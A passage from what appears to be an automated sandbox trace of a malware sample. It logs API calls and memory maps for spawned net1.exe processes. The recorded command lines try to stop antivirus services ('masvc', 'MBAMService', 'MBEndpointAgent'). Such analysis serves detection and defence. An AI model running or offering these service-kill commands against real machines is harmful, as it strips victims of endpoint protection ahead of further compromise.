hConsoleOutput=0xb, lpBuffer=0xff1b5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1cf6f0, lpReserved=0x0 | out: lpBuffer=0xff1b5b50*, lpNumberOfCharsWritten=0x1cf6f0*=0x34) returned 1 [0098.558] GetFileType (hFile=0xb) returned 0x2 [0098.559] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf6f8 | out: lpMode=0x1cf6f8) returned 1 [0098.559] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff191efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cf6f0, lpReserved=0x0 | out: lpBuffer=0xff191efc*, lpNumberOfCharsWritten=0x1cf6f0*=0x2) returned 1 [0098.559] NetApiBufferFree (Buffer=0x374d40) returned 0x0 [0098.559] NetApiBufferFree (Buffer=0x37c0e0) returned 0x0 [0098.559] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop masvc /y" [0098.559] exit (_Code=2) Process: id = "132" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x56a22000" os_pid = "0x10b0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "127" os_parent_pid = "0x1078" cmd_line = "C:\\Windows\\system32\\net1 stop MBAMService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6030 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6031 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6032 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6033 start_va = 0x110000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 6034 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6035 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6036 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6037 start_va = 0xff190000 end_va = 0xff1c2fff entry_point = 0xff190000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 6038 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6039 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6040 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 6041 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 6042 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 6043 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6044 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6048 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6049 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 6050 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6051 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 6052 start_va = 0x620000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 6053 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 6054 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 6055 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 6056 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 6057 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 6058 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 6059 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 6060 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 6061 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 6062 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 6063 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 6064 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 6065 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6066 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6067 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 6068 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 6069 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6070 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6095 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 548 os_tid = 0xf60 [0098.515] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fa90 | out: lpSystemTimeAsFileTime=0x18fa90*(dwLowDateTime=0xefe48f10, dwHighDateTime=0x1d48689)) [0098.516] GetCurrentProcessId () returned 0x10b0 [0098.516] GetCurrentThreadId () returned 0xf60 [0098.516] GetTickCount () returned 0x226c1 [0098.516] QueryPerformanceCounter (in: lpPerformanceCount=0x18fa98 | out: lpPerformanceCount=0x18fa98*=1814543400000) returned 1 [0098.517] GetModuleHandleW (lpModuleName=0x0) returned 0xff190000 [0098.517] __set_app_type (_Type=0x1) [0098.517] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff1a9c9c) returned 0x0 [0098.517] __getmainargs (in: _Argc=0xff1b4780, _Argv=0xff1b4790, _Env=0xff1b4788, _DoWildCard=0, _StartInfo=0xff1b479c | out: _Argc=0xff1b4780, _Argv=0xff1b4790, _Env=0xff1b4788) returned 0 [0098.518] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0098.518] GetConsoleOutputCP () returned 0x1b5 [0098.518] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff1bcec0 | out: lpCPInfo=0xff1bcec0) returned 1 [0098.518] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0098.520] sprintf_s (in: _DstBuf=0x18fa38, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0098.520] setlocale (category=0, locale=".437") returned="English_United States.437" [0098.522] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0098.522] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0098.522] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MBAMService /y" [0098.522] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f7d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0098.522] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0098.522] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x18fa28 | out: Buffer=0x18fa28*=0x354d50) returned 0x0 [0098.522] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x18fa28 | out: Buffer=0x18fa28*=0x35c100) returned 0x0 [0098.522] _fileno (_File=0x7fefdba2a80) returned 0 [0098.523] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0098.523] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0098.523] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0098.523] _wcsicmp (_String1="config", _String2="stop") returned -16 [0098.523] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0098.523] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0098.523] _wcsicmp (_String1="file", _String2="stop") returned -13 [0098.523] _wcsicmp (_String1="files", _String2="stop") returned -13 [0098.523] _wcsicmp (_String1="group", _String2="stop") returned -12 [0098.523] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0098.523] _wcsicmp (_String1="help", _String2="stop") returned -11 [0098.523] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0098.523] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0098.523] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0098.523] _wcsicmp (_String1="session", _String2="stop") returned -15 [0098.523] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0098.523] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0098.524] _wcsicmp (_String1="share", _String2="stop") returned -12 [0098.524] _wcsicmp (_String1="start", _String2="stop") returned -14 [0098.524] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0098.524] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0098.524] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0098.524] _wcsicmp (_String1="accounts", _String2="MBAMService") returned -12 [0098.524] _wcsicmp (_String1="computer", _String2="MBAMService") returned -10 [0098.524] _wcsicmp (_String1="config", _String2="MBAMService") returned -10 [0098.524] _wcsicmp (_String1="continue", _String2="MBAMService") returned -10 [0098.524] _wcsicmp (_String1="cont", _String2="MBAMService") returned -10 [0098.524] _wcsicmp (_String1="file", _String2="MBAMService") returned -7 [0098.524] _wcsicmp (_String1="files", _String2="MBAMService") returned -7 [0098.524] _wcsicmp (_String1="group", _String2="MBAMService") returned -6 [0098.524] _wcsicmp (_String1="groups", _String2="MBAMService") returned -6 [0098.524] _wcsicmp (_String1="help", _String2="MBAMService") returned -5 [0098.524] _wcsicmp (_String1="helpmsg", _String2="MBAMService") returned -5 [0098.524] _wcsicmp (_String1="localgroup", _String2="MBAMService") returned -1 [0098.524] _wcsicmp (_String1="pause", _String2="MBAMService") returned 3 [0098.524] _wcsicmp (_String1="session", _String2="MBAMService") returned 6 [0098.524] _wcsicmp (_String1="sessions", _String2="MBAMService") returned 6 [0098.525] _wcsicmp (_String1="sess", _String2="MBAMService") returned 6 [0098.525] _wcsicmp (_String1="share", _String2="MBAMService") returned 6 [0098.525] _wcsicmp (_String1="start", _String2="MBAMService") returned 6 [0098.525] _wcsicmp (_String1="stats", _String2="MBAMService") returned 6 [0098.525] _wcsicmp (_String1="statistics", _String2="MBAMService") returned 6 [0098.525] _wcsicmp (_String1="stop", _String2="MBAMService") returned 6 [0098.525] _wcsicmp (_String1="time", _String2="MBAMService") returned 7 [0098.525] _wcsicmp (_String1="user", _String2="MBAMService") returned 8 [0098.525] _wcsicmp (_String1="users", _String2="MBAMService") returned 8 [0098.525] _wcsicmp (_String1="msg", _String2="MBAMService") returned 17 [0098.525] _wcsicmp (_String1="messenger", _String2="MBAMService") returned 3 [0098.525] _wcsicmp (_String1="receiver", _String2="MBAMService") returned 5 [0098.525] _wcsicmp (_String1="rcv", _String2="MBAMService") returned 5 [0098.525] _wcsicmp (_String1="netpopup", _String2="MBAMService") returned 1 [0098.525] _wcsicmp (_String1="redirector", _String2="MBAMService") returned 5 [0098.525] _wcsicmp (_String1="redir", _String2="MBAMService") returned 5 [0098.525] _wcsicmp (_String1="rdr", _String2="MBAMService") returned 5 [0098.525] _wcsicmp (_String1="workstation", _String2="MBAMService") returned 10 [0098.525] _wcsicmp (_String1="work", _String2="MBAMService") returned 10 [0098.525] _wcsicmp (_String1="wksta", _String2="MBAMService") returned 10 [0098.525] _wcsicmp (_String1="prdr", _String2="MBAMService") returned 3 [0098.525] _wcsicmp (_String1="devrdr", _String2="MBAMService") returned -9 [0098.525] _wcsicmp (_String1="lanmanworkstation", _String2="MBAMService") returned -1 [0098.525] _wcsicmp (_String1="server", _String2="MBAMService") returned 6 [0098.525] _wcsicmp (_String1="svr", _String2="MBAMService") returned 6 [0098.526] _wcsicmp (_String1="srv", _String2="MBAMService") returned 6 [0098.526] _wcsicmp (_String1="lanmanserver", _String2="MBAMService") returned -1 [0098.526] _wcsicmp (_String1="alerter", _String2="MBAMService") returned -12 [0098.526] _wcsicmp (_String1="netlogon", _String2="MBAMService") returned 1 [0098.526] _wcsupr (in: _String="MBAMService" | out: _String="MBAMSERVICE") returned="MBAMSERVICE" [0098.526] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x35ce10 [0098.569] GetServiceKeyNameW (in: hSCManager=0x35ce10, lpDisplayName="MBAMSERVICE", lpServiceName=0xff1b5750, lpcchBuffer=0x18f948 | out: lpServiceName="", lpcchBuffer=0x18f948) returned 0 [0098.570] _wcsicmp (_String1="msg", _String2="MBAMSERVICE") returned 17 [0098.570] _wcsicmp (_String1="messenger", _String2="MBAMSERVICE") returned 3 [0098.570] _wcsicmp (_String1="receiver", _String2="MBAMSERVICE") returned 5 [0098.570] _wcsicmp (_String1="rcv", _String2="MBAMSERVICE") returned 5 [0098.570] _wcsicmp (_String1="redirector", _String2="MBAMSERVICE") returned 5 [0098.570] _wcsicmp (_String1="redir", _String2="MBAMSERVICE") returned 5 [0098.570] _wcsicmp (_String1="rdr", _String2="MBAMSERVICE") returned 5 [0098.570] _wcsicmp (_String1="workstation", _String2="MBAMSERVICE") returned 10 [0098.570] _wcsicmp (_String1="work", _String2="MBAMSERVICE") returned 10 [0098.570] _wcsicmp (_String1="wksta", _String2="MBAMSERVICE") returned 10 [0098.570] _wcsicmp (_String1="prdr", _String2="MBAMSERVICE") returned 3 [0098.570] _wcsicmp (_String1="devrdr", _String2="MBAMSERVICE") returned -9 [0098.570] _wcsicmp (_String1="lanmanworkstation", _String2="MBAMSERVICE") returned -1 [0098.570] _wcsicmp (_String1="server", _String2="MBAMSERVICE") returned 6 [0098.570] _wcsicmp (_String1="svr", _String2="MBAMSERVICE") returned 6 [0098.570] _wcsicmp (_String1="srv", _String2="MBAMSERVICE") returned 6 [0098.570] _wcsicmp (_String1="lanmanserver", _String2="MBAMSERVICE") returned -1 [0098.570] _wcsicmp (_String1="alerter", _String2="MBAMSERVICE") returned -12 [0098.570] _wcsicmp (_String1="netlogon", _String2="MBAMSERVICE") returned 1 [0098.571] NetServiceControl (in: servername=0x0, service="MBAMSERVICE", opcode=0x0, arg=0x0, bufptr=0x18f950 | out: bufptr=0x18f950) returned 0x889 [0098.571] wcscpy_s (in: _Destination=0xff1b80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0098.572] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0098.572] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff1b5b50, nSize=0x800, Arguments=0xff1b7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0098.574] GetFileType (hFile=0xb) returned 0x2 [0098.574] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f818 | out: lpMode=0x18f818) returned 1 [0098.574] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff1b5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x18f810, lpReserved=0x0 | out: lpBuffer=0xff1b5b50*, lpNumberOfCharsWritten=0x18f810*=0x1e) returned 1 [0098.575] GetFileType (hFile=0xb) returned 0x2 [0098.575] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f818 | out: lpMode=0x18f818) returned 1 [0098.575] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff191efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f810, lpReserved=0x0 | out: lpBuffer=0xff191efc*, lpNumberOfCharsWritten=0x18f810*=0x2) returned 1 [0098.576] _ultow (in: _Dest=0x889, _Radix=1636480 | out: _Dest=0x889) returned="2185" [0098.576] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff1b5b50, nSize=0x800, Arguments=0xff1b7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0098.576] GetFileType (hFile=0xb) returned 0x2 [0098.576] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f818 | out: lpMode=0x18f818) returned 1 [0098.577] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff1b5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x18f810, lpReserved=0x0 | out: lpBuffer=0xff1b5b50*, lpNumberOfCharsWritten=0x18f810*=0x34) returned 1 [0098.577] GetFileType (hFile=0xb) returned 0x2 [0098.577] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f818 | out: lpMode=0x18f818) returned 1 [0098.577] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff191efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f810, lpReserved=0x0 | out: lpBuffer=0xff191efc*, lpNumberOfCharsWritten=0x18f810*=0x2) returned 1 [0098.578] NetApiBufferFree (Buffer=0x354d50) returned 0x0 [0098.578] NetApiBufferFree (Buffer=0x35c100) returned 0x0 [0098.578] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MBAMService /y" [0098.578] exit (_Code=2) Process: id = "133" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x52fbb000" os_pid = "0xe60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "128" os_parent_pid = "0xce8" cmd_line = "C:\\Windows\\system32\\net1 stop MBEndpointAgent /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6096 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6097 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6098 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6099 start_va = 0xb0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 6100 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6101 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6102 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6103 start_va = 0xffe00000 end_va = 0xffe32fff entry_point = 0xffe00000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 6104 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6105 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6106 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 6107 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 6108 start_va = 0x160000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 6109 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6110 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6111 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6112 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 6113 start_va = 0x260000 end_va = 0x2c6fff entry_point = 0x260000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6114 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 6115 start_va = 0x470000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6116 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 6117 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 6118 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 6119 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 6120 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 6121 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 6122 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 6123 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 6124 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 6125 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 6126 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 6127 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 6128 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6129 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6130 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 6131 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = 